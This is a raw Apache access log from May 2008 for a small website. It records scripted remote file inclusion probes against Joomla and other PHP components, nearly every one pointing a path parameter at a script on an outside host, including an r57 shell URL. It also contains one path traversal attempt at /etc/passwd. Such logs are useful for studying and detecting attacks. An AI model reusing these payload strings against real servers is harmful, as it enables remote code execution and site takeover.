74.6.22.174 - - [19/May/2008:10:55:52 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
70.84.182.98 - - [19/May/2008:10:56:05 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.182.98 - - [19/May/2008:10:56:05 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.61.159.151 - - [19/May/2008:10:56:13 -0700] "GET /logs/access_080220.log/joomla/index.php?option=com_restaurante&task=http://www.gok.superhost.pl/administrator/components/com_securityimages/patches/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
65.61.159.151 - - [19/May/2008:10:56:13 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.gok.superhost.pl/administrator/components/com_securityimages/patches/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
65.61.159.151 - - [19/May/2008:10:56:14 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.gok.superhost.pl/administrator/components/com_securityimages/patches/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
203.116.91.54 - - [19/May/2008:10:56:25 -0700] "GET /logs//send_reminders.php?includedir=http://www.geocities.com/rinasarmila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
203.116.91.54 - - [19/May/2008:10:56:26 -0700] "GET //send_reminders.php?includedir=http://www.geocities.com/rinasarmila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
212.113.24.150 - - [19/May/2008:10:56:38 -0700] "GET /logs/access_080220.log/joomla/index.php?option=com_restaurante&task=http://www.gok.superhost.pl/administrator/components/com_securityimages/patches/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.150 - - [19/May/2008:10:56:38 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.gok.superhost.pl/administrator/components/com_securityimages/patches/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.150 - - [19/May/2008:10:56:39 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.gok.superhost.pl/administrator/components/com_securityimages/patches/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
65.61.159.151 - - [19/May/2008:10:56:43 -0700] "GET /logs/access_080223.log/joomla/index.php?option=com_restaurante&task=http://www.gok.superhost.pl/administrator/components/com_securityimages/patches/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
217.197.68.66 - - [19/May/2008:10:56:48 -0700] "GET /logs/access_080327.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.59.145.196 - - [19/May/2008:10:56:49 -0700] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.59.145.196 - - [19/May/2008:10:56:49 -0700] "GET /modules/My_eGallery/index.php?basepath=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.59.145.196 - - [19/May/2008:10:56:49 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.113.24.150 - - [19/May/2008:10:56:55 -0700] "GET /logs/access_080223.log/joomla/index.php?option=com_restaurante&task=http://www.gok.superhost.pl/administrator/components/com_securityimages/patches/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
217.197.68.66 - - [19/May/2008:10:56:56 -0700] "GET /logs/access_080327.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://tutorials.fyreblade.com/cx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.132.204.166 - - [19/May/2008:10:57:13 -0700] "GET /logs/access_071228.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.132.204.166 - - [19/May/2008:10:57:13 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.84.182.98 - - [19/May/2008:10:57:19 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.182.98 - - [19/May/2008:10:57:20 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.132.204.166 - - [19/May/2008:10:57:23 -0700] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.116.44.60 - - [19/May/2008:10:57:31 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.75.12.148 - - [19/May/2008:10:57:34 -0700] "GET /logs//send_reminders.php?includedir=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.12.148 - - [19/May/2008:10:57:34 -0700] "GET //send_reminders.php?includedir=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.125.251.37 - - [19/May/2008:10:57:50 -0700] "GET /logs/access_080219.log//include.php?path[docroot]=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
220.125.251.37 - - [19/May/2008:10:57:50 -0700] "GET /logs/access_080219.log//include.php?path[docroot]=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
220.125.251.37 - - [19/May/2008:10:57:50 -0700] "GET //include.php?path[docroot]=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
220.125.251.37 - - [19/May/2008:10:57:50 -0700] "GET //include.php?path[docroot]=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
220.125.251.37 - - [19/May/2008:10:57:51 -0700] "GET /logs//include.php?path[docroot]=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
220.125.251.37 - - [19/May/2008:10:57:51 -0700] "GET /logs//include.php?path[docroot]=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
220.125.251.37 - - [19/May/2008:10:57:56 -0700] "GET /logs/access_080219.log//include.php?path[docroot]=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
220.125.251.37 - - [19/May/2008:10:57:56 -0700] "GET //include.php?path[docroot]=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
220.125.251.37 - - [19/May/2008:10:57:57 -0700] "GET /logs//include.php?path[docroot]=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
220.125.251.37 - - [19/May/2008:10:58:04 -0700] "GET /logs/access_080219.log//include.php?path[docroot]=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
220.125.251.37 - - [19/May/2008:10:58:04 -0700] "GET //include.php?path[docroot]=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
220.125.251.37 - - [19/May/2008:10:58:05 -0700] "GET /logs//include.php?path[docroot]=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.97.132.101 - - [19/May/2008:10:58:08 -0700] "GET /logs/access_080229.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://8-p.ru/components/id.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
207.58.138.166 - - [19/May/2008:10:58:12 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.142.223.177 - - [19/May/2008:10:58:25 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.greytauctions.org/phpAdsNew/auctions.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.97.132.101 - - [19/May/2008:10:58:26 -0700] "GET /logs/access_080229.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://8-p.ru/components/id.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
80.82.209.212 - - [19/May/2008:10:58:41 -0700] "GET /logs/access_080121.log//modules/TotalCalendar/about.php?inc_dir=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.82.209.212 - - [19/May/2008:10:58:42 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.82.209.212 - - [19/May/2008:10:58:42 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.51.26.82 - - [19/May/2008:10:58:49 -0700] "GET /logs/access_080120.log//skin/zero_vote/error.php?dir=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.51.26.82 - - [19/May/2008:10:58:51 -0700] "GET //skin/zero_vote/error.php?dir=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.51.26.82 - - [19/May/2008:10:58:51 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.51.26.82 - - [19/May/2008:10:58:52 -0700] "GET /logs/access_080107.log//skin/zero_vote/error.php?dir=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.82.209.212 - - [19/May/2008:10:59:11 -0700] "GET /logs/access_080213.log//modules/TotalCalendar/about.php?inc_dir=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.2.252.18 - - [19/May/2008:10:59:55 -0700] "GET /logs/access_080223.log/index.php?get=http://electrometro.com.ve/wall/xpl/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.2.252.18 - - [19/May/2008:11:00:02 -0700] "GET /index.php?get=http://electrometro.com.ve/wall/xpl/safe.txt??????? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
217.96.20.66 - - [19/May/2008:11:00:04 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://www.wendyandkimberly.com/img/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.2.252.18 - - [19/May/2008:11:00:05 -0700] "GET /logs/index.php?get=http://electrometro.com.ve/wall/xpl/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.96.20.66 - - [19/May/2008:11:00:09 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.wendyandkimberly.com/img/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.96.20.66 - - [19/May/2008:11:00:10 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.wendyandkimberly.com/img/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.219.173.57 - - [19/May/2008:11:00:22 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
210.219.173.57 - - [19/May/2008:11:00:22 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
200.59.145.196 - - [19/May/2008:11:00:30 -0700] "GET /logs/access_080120.log//skin/zero_vote/error.php?dir=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.59.145.196 - - [19/May/2008:11:00:31 -0700] "GET //skin/zero_vote/error.php?dir=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.59.145.196 - - [19/May/2008:11:00:31 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.59.145.196 - - [19/May/2008:11:00:32 -0700] "GET /logs/access_080107.log//skin/zero_vote/error.php?dir=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.239.157.171 - - [19/May/2008:11:00:50 -0700] "GET /logs/index.php?root_path=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
211.239.157.171 - - [19/May/2008:11:00:55 -0700] "GET /index.php?root_path=http://fadhilla.net/test.txt? HTTP/1.1" 200 11606 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
211.62.35.164 - - [19/May/2008:11:01:00 -0700] "GET /logs/index.php?root_path=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
211.62.35.164 - - [19/May/2008:11:01:11 -0700] "GET /index.php?root_path=http://fadhilla.net/test.txt? HTTP/1.1" 200 11606 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
64.38.4.3 - - [19/May/2008:11:01:12 -0700] "GET /cyberfolio_7_12/portfolio/commentaires/derniers_commentaires.php?rep=http://jikustik.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
64.38.4.3 - - [19/May/2008:11:01:12 -0700] "GET /logs/cyberfolio_7_12/portfolio/commentaires/derniers_commentaires.php?rep=http://jikustik.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
208.71.129.241 - - [19/May/2008:11:01:14 -0700] "GET /cyberfolio_7_12/portfolio/commentaires/derniers_commentaires.php?rep=http://www.cerfirenze.it/images/icone/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
209.62.80.134 - - [19/May/2008:11:01:16 -0700] "GET /cyberfolio_7_12/portfolio/commentaires/derniers_commentaires.php?rep=http://justbarelylegal.com/ct/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
209.62.80.134 - - [19/May/2008:11:01:16 -0700] "GET /logs/cyberfolio_7_12/portfolio/commentaires/derniers_commentaires.php?rep=http://justbarelylegal.com/ct/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
208.71.129.241 - - [19/May/2008:11:01:16 -0700] "GET /logs/cyberfolio_7_12/portfolio/commentaires/derniers_commentaires.php?rep=http://www.cerfirenze.it/images/icone/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
211.62.35.166 - - [19/May/2008:11:01:21 -0700] "GET /logs/index.php?root_path=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
217.96.20.66 - - [19/May/2008:11:01:28 -0700] "GET /logs/access_080106.log//skin/zero_vote/ask_password.php?dir=http://www.wendyandkimberly.com/img/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.62.35.166 - - [19/May/2008:11:01:30 -0700] "GET /index.php?root_path=http://fadhilla.net/test.txt? HTTP/1.1" 200 11606 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
222.231.60.28 - - [19/May/2008:11:01:45 -0700] "GET //components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://jikustik.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
203.130.242.48 - - [19/May/2008:11:01:46 -0700] "GET /logs///////administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.snijdersverfenbehang.nl/cache/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.242.48 - - [19/May/2008:11:01:47 -0700] "GET ///////administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.snijdersverfenbehang.nl/cache/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.231.60.28 - - [19/May/2008:11:01:48 -0700] "GET /logs//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://jikustik.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
222.231.60.28 - - [19/May/2008:11:01:52 -0700] "GET /logs/index.php?root_path=http://jikustik.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
222.231.60.28 - - [19/May/2008:11:01:53 -0700] "GET //components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
222.231.60.28 - - [19/May/2008:11:01:54 -0700] "GET /logs//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
222.231.60.28 - - [19/May/2008:11:02:01 -0700] "GET /index.php?root_path=http://jikustik.t35.com/test.txt? HTTP/1.1" 200 11606 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
203.130.242.48 - - [19/May/2008:11:02:14 -0700] "GET /logs/access.log///////administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.snijdersverfenbehang.nl/cache/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.219.173.57 - - [19/May/2008:11:02:15 -0700] "GET /logs/cyberfolio_7_12/portfolio/commentaires/derniers_commentaires.php?rep=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
210.219.173.57 - - [19/May/2008:11:02:15 -0700] "GET /cyberfolio_7_12/portfolio/commentaires/derniers_commentaires.php?rep=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
203.130.232.188 - - [19/May/2008:11:02:26 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.h1.ripway.com/qalby/shell/r57?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
203.130.232.188 - - [19/May/2008:11:02:26 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.h1.ripway.com/qalby/shell/r57?? HTTP/1.1" 200 50 "-" "libwww-perl/5.811" "www.dmulk.com"
203.130.232.188 - - [19/May/2008:11:02:27 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.h1.ripway.com/qalby/shell/r57?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.114.130.19 - - [19/May/2008:11:02:39 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://dalnethacker.fileave.com/XXX-22.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
124.0.159.198 - - [19/May/2008:11:02:43 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://www.cnhsed.go.kr/heukshin/board/rgboard/data/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
124.0.159.198 - - [19/May/2008:11:02:44 -0700] "GET //include/admin.lib.inc.php?site_path=http://www.cnhsed.go.kr/heukshin/board/rgboard/data/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
124.0.159.198 - - [19/May/2008:11:02:44 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.cnhsed.go.kr/heukshin/board/rgboard/data/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.114.130.19 - - [19/May/2008:11:02:48 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://dalnethacker.fileave.com/XXX-22.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.47.201.117 - - [19/May/2008:11:02:49 -0700] "GET /logs/access_080125.log//send_reminders.php?includedir=http://www.privatox.altervista.org/idnews.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.201.117 - - [19/May/2008:11:02:49 -0700] "GET /logs//send_reminders.php?includedir=http://www.privatox.altervista.org/idnews.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.201.117 - - [19/May/2008:11:02:49 -0700] "GET /logs/access_080104.log//send_reminders.php?includedir=http://www.privatox.altervista.org/idnews.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.51.232.116 - - [19/May/2008:11:04:00 -0700] "GET /logs/access_071225.log//admin.php?show=../../../../../../../etc/passwd=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.142.223.177 - - [19/May/2008:11:04:20 -0700] "GET /logs/access_080211.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.greytauctions.org/phpAdsNew/auctions.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.142.223.177 - - [19/May/2008:11:04:22 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.greytauctions.org/phpAdsNew/auctions.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
218.38.34.67 - - [19/May/2008:11:04:32 -0700] "GET /logs/access_080219.log//include.php?path[docroot]=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.34.67 - - [19/May/2008:11:04:32 -0700] "GET //include.php?path[docroot]=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.34.67 - - [19/May/2008:11:04:32 -0700] "GET /logs//include.php?path[docroot]=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.59.145.196 - - [19/May/2008:11:04:35 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.59.145.196 - - [19/May/2008:11:04:35 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.59.145.196 - - [19/May/2008:11:04:41 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.142.223.177 - - [19/May/2008:11:04:43 -0700] "GET /logs/access_071229.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.greytauctions.org/phpAdsNew/auctions.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.97.132.101 - - [19/May/2008:11:05:06 -0700] "GET /logs/access_080326.log//sidebar.php?loadpage=http://8-p.ru/components/id.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [19/May/2008:11:05:06 -0700] "GET //sidebar.php?loadpage=http://8-p.ru/components/id.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [19/May/2008:11:05:07 -0700] "GET /logs//sidebar.php?loadpage=http://8-p.ru/components/id.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [19/May/2008:11:05:09 -0700] "GET /logs/access_080326.log//sidebar.php?loadpage=http://8-p.ru/components/id.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [19/May/2008:11:05:09 -0700] "GET //sidebar.php?loadpage=http://8-p.ru/components/id.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [19/May/2008:11:05:10 -0700] "GET /logs//sidebar.php?loadpage=http://8-p.ru/components/id.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
65.55.213.30 - - [19/May/2008:11:05:25 -0700] "GET /logs/access_080510.log HTTP/1.0" 200 3452284 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
210.203.73.105 - - [19/May/2008:11:05:44 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.203.73.105 - - [19/May/2008:11:05:45 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
58.26.137.64 - - [19/May/2008:11:05:46 -0700] "GET /logs//start.php?s=http://83.222.131.90/~legitimi/mybase/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
